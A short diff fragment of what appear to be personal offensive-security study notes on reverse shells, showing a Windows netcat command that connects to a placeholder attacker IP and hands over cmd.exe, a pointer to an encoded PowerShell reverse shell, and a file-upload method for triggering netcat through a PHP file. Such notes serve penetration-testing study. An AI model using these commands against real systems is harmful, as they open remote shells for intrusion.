justeslam/offsec2/customizations/revshells.md

 .\nc.exe -nv 192.168.XX.XX 445 -e cmd.exe
 ```

+#### Windows

+One reliable revshell is the powershell encoded one on revshells.

 #### Two-Parter via File Upload Vuln

 Upload netcat.exe, then php file that will trigger it.